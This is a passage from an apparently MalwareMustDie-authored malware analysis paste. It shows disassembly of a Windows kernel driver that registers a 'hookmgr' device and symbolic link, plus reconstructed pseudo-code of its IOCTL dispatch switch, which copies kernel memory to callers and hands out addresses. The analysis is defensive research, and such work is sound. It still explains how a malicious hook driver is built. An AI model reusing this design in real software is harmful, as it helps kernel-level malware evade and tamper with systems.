  304. // it creates the hook manager device as driver
  305. |       |   0x0001403e      8bff           mov edi, edi
  306. |       |   0x00014040      55             push ebp
  307. |       |   0x00014041      8bec           mov ebp, esp
  308. |       |   0x00014043      e8bdffffff     call 0x14005
  309. |       |   0x00014048      5d             pop ebp
  310. \       `=< 0x00014049      e9c2d2ffff     jmp 0x11310
  311.                   ↓ ↓ ↓ ↓ ↓
  312. |           0x00011310      8bff           mov edi, edi
  313. |           0x00011312      55             push ebp
  314. |           0x00011313      8bec           mov ebp, esp
  315. |           0x00011315      83ec0c         sub esp, 0xc
  316. |           0x00011318      c745f4101801.  mov dword [ebp-local_3], 0x11810 ; [0x11810:4]="\\Device\\hookmgr"
  317. |           0x0001131f      c745f8e01701.  mov dword [ebp-local_2], 0x117e0 ; [0x117e0:4]="\\DosDevices\\hookmgr"
  318. |           0x00011326      8b45f4         mov eax, dword [ebp-local_3] ; source = ebp-local_3
  319. |           0x00011329      50             push eax        ;  source
  320. |           0x0001132a      6828300100     push 0x13028    ;  dest
  321. |           0x0001132f      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  322. |           0x00011335      8b4df8         mov ecx, dword [ebp-local_2] ; src = ebp-local_2
  323. |           0x00011338      51             push ecx       ; src
  324. |           0x00011339      6830300100     push 0x13030   ; dest
  325. |           0x0001133e      ff1504200100   call dword [0x012004] ; ntoskrnl.exe_RtlInitUnicodeString
  326. |           0x00011344      6818300100     push 0x13018  ; Object Device (DeviceObject)
  327. |           0x00011349      6a00           push 0        ; excl bit
  328. |           0x0001134b      6a00           push 0        ; characteristic
  329. |           0x0001134d      6a15           push 0x15     ; type
  330. |           0x0001134f      6828300100     push 0x13028  ; name
  331. |           0x00011354      6a00           push 0        ; extention
  332. |           0x00011356      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  333. |           0x00011359      52             push edx      ; object
  334. |           0x0001135a      ff1520200100   call dword [0x12020] ; ntoskrnl.exe_IoCreateDevice
  335. |           0x00011360      8945fc         mov dword [ebp-local_1], eax
  336. |           0x00011363      837dfc00       cmp dword [ebp-local_1], 0
  337. |       ,=< 0x00011367      7c4a           jl 0x113b3
  338.  
  339. ////////////////////////////////
  340. symbolic link wrote & drv deletion....
  341. ////////////////////////////////
  342. |       |   0x00011369      6828300100     push 0x13028
  343. |       |   0x0001136e      6830300100     push 0x13030
  344. |       |   0x00011373      ff151c200100   call dword [sym.imp.ntoskrnl.exe_IoCreateSymbolicLink] ; ".A" @ 0x1201c
  345. |       |   0x00011379      8945fc         mov dword [ebp-local_1], eax
  346. |       |   0x0001137c      837dfc00       cmp dword [ebp-local_1], 0
  347. |      ,==< 0x00011380      7c24           jl 0x113a6
  348. |      ||   0x00011382      8b4508         mov eax, dword [ebp+arg_2]  ; [0x8:4]=4
  349. |      ||   0x00011385      c74070701001.  mov dword [eax + 0x70], 0x11070 ; [0x11070:4]=0x8b55ff8b
  350. |      ||   0x0001138c      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  351. |      ||   0x0001138f      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  352. |      ||   0x00011392      8b4270         mov eax, dword [edx + 0x70] ; [0x70:4]=0x65646f6d  ; 'p' ; "mode....$" @ 0x70
  353. |      ||   0x00011395      894140         mov dword [ecx + 0x40], eax
  354. |      ||   0x00011398      8b4d08         mov ecx, dword [ebp+arg_2]  ; [0x8:4]=4
  355. |      ||   0x0001139b      8b5508         mov edx, dword [ebp+arg_2]  ; [0x8:4]=4
  356. |      ||   0x0001139e      8b4240         mov eax, dword [edx + 0x40] ; [0x40:4]=0xeba1f0e  ; '@'
  357. |      ||   0x000113a1      894138         mov dword [ecx + 0x38], eax
  358. |     ,===< 0x000113a4      eb0d           jmp 0x113b3
  359. |     |`--> 0x000113a6      8b0d18300100   mov ecx, dword [0x13018]    ; [0x13018:4]=0
  360. |     | |   0x000113ac      51             push ecx
  361. |     | |   0x000113ad      ff1518200100   call dword [sym.imp.ntoskrnl.exe_IoDeleteDevice] ; sym.imp.ntoskrnl.exe_IoDeleteDevice
  362. |     | |   ; JMP XREF from 0x000113a4 (fcn.00011310)
  363. |     `-`-> 0x000113b3      8b45fc         mov eax, dword [ebp-local_1]
  364. |           0x000113b6      8be5           mov esp, ebp
  365. |           0x000113b8      5d             pop ebp
  366. \           0x000113b9      c20800         ret 8
  367.  
  368. ///////////////////////////////////
  369. Driver switches for actions
  370. //////////////////////////////////
  371. fn.0x011070 ;;
  372. int ({eax}, int[var_loc], PIRP Irp)
  373. {
  374.   ULONG_PTR  [sp-0x010] [bp-254]
  375.   ULONG_PTR  [sp+0x22C] [bp-18]
  376.   ULONG_PTR  [sp+0x23C] [bp-8]
  377.  
  378.   char var0x01 = [sp+0x00C] [bp-0x0238]
  379.   char var0x02 = [sp+0x004] [bp-0x0240]
  380.   char var0x04 = [sp+0x22C] [bp-0x018h]
  381.  
  382.   var0x02 = *(_BYTE *)0x012B0(Irp);  
  383.   if ( var0x02 == 14 )
  384.   {
  385.     switch ( {*(_DWORD *)(v9 + 12);} )
  386.     {
  387. /////////////////////////
  388.       case 0x224004:
  389. ////////////////////////
  390.         if ( v8 < 0xC )
  391.         {
  392.           var0x01 = -0xERR;
  393.         }
  394.         else
  395.         {
  396.           {-2} = 0;
  397.           ProbeForWrite(*(PVOID *)&{Irp->AssociatedIrp.MasterIrp;}->Type, {Irp->AssociatedIrp.MasterIrp;}->Flags, 1u);
  398.           memcpy(*(void **)&v11->Type, v11->MdlAddress, v11->Flags);
  399.           var0x01 = 0;
  400.           {-2} = -2;
  401.         }
  402.         break;
  403.  
  404. ////////////////////////
  405.       case 0x22400C:
  406. ////////////////////////
  407.         if ( !DWORD-0x1301C )
  408.           DWORD-0x1301C = (int)sub_11010();
  409.         if ( DWORD-0x1301C )
  410.         {
  411.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x1301C;
  412.           Irp->IoStatus.Information = 4;
  413.           var0x01 = 0;
  414.         }
  415.         else
  416.         {
  417.           var0x01 = -0xERR;
  418.         }
  419.         break;
  420.  
  421. /////////////////////////
  422.       case 0x224014:
  423. ////////////////////////
  424.         if ( !DWORD-0x13020 )
  425.           DWORD-0x13020 = (int)sub_11040();
  426.         if ( DWORD-0x13020 )
  427.         {
  428.           *(_DWORD *)&{Irp->AssociatedIrp.MasterIrp;}->Type = DWORD-0x13020;
  429.           Irp->IoStatus.Information = 4;
  430.           var0x01 = 0;
  431.         }
  432.         else
  433.         {
  434.           var0x01 = -0xERR;
  435.         }
  436.         break;
  437.  
  438. ////////////////////
  439.       default:
  440. ////////////////////
  441.         var0x01 = -0xERR;
  442.         break;
  443.     }
  444.   }
  445. ///////////////
  446.   else
  447. //////////////
  448.   {
  449.     var0x01 = 0;
  450.   }
  451.   var0x01{Irp->IoStatus.Status}
  452.   IofCompleteRequest(Irp, 0);
  453.   return 0;
  454. }
  455.  
  456. Explanation of the switch-case above is in kernelmode by the help from FireFox:
  457. http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4217&p=27791#p27792
  458.  
  459. #  @unixfreaxjp | #MalwareMustDie
RAW Paste Data
Top